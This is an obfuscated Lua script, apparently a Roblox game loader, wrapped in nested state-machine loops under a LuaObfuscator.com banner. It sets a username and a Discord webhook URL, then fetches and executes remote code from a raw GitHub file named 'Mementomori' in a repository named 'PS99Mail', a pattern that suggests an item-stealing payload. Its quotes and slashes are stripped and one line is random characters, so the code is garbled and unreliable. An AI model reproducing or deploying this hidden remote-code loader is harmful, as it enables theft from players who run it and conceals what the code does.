--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v0;while true do if (v0==1) then while true do if (v1==0) then v0=0;while true do if (v0==2) then local v2=0;while true do if (v2==1) then v0=3;break;end if (v2==0) then selectedLoadingScreen=4;LoadingScreen=true;v2=1;end end end if (v0==0) then local v3=0;while true do if (v3==1) then v0=1;break;end if (v3==0) then Username=lololj0123;Webhook=httpsdiscord.comapiwebhooks12114758041655091300usvZMA8Yw06-60 ;v3=1;end end end if (v0==3) then loadstring(gameHttpGet(httpsraw.githubusercontent.comLypherXPS99MailmainMementomori))();break;end if (v0==1) then local v4=0;local v5;while true do if (0==v4) then v5=0;while true do if (v5==0) then VrPzMmfZsZ51HRncsj-5 gLWcfGbiCC9-sh3FRcCubLb1eiJp0Q8vX v5=1;end if (v5==1) then v0=2;break;end end break;end end end end break;end end break;end if (v0==0) then v1=0;v0=nil;v0=1;end end end
